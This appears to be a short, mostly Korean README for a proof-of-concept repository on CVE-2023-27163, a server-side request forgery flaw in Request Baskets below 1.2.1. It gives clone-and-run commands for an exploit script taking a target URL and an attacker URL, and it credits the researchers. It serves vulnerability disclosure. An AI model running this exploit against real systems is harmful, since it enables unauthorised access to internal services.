
CVE-2023-27163 - Request Baskets SSRF
Request Baskets SSRF PoC
alt text
Request Baskets 1.2.1 미만 버전은 /api/baskets/{name} 구성 요소를 통해 SSRF(Server Side Request Forgery, 서버 측 요청 위조) 공격에 취약합니다.
git clone https://github.com/rvizx/CVE-2023-27163
cd CVE-2023-27163
chmod +x exploit.sh
./exploit.sh <target_url> <attacker_url>
상하이 자오퉁 대학(Shanghai Jiao Tong University)의 @beet1e와 산둥 대학(Shandong University)의 @chenlibo147, @houqinsheng, [email protected]에게 감사를 표합니다. 관련 글 : https://notes.sjtu.edu.cn/s/MUUhEymt7#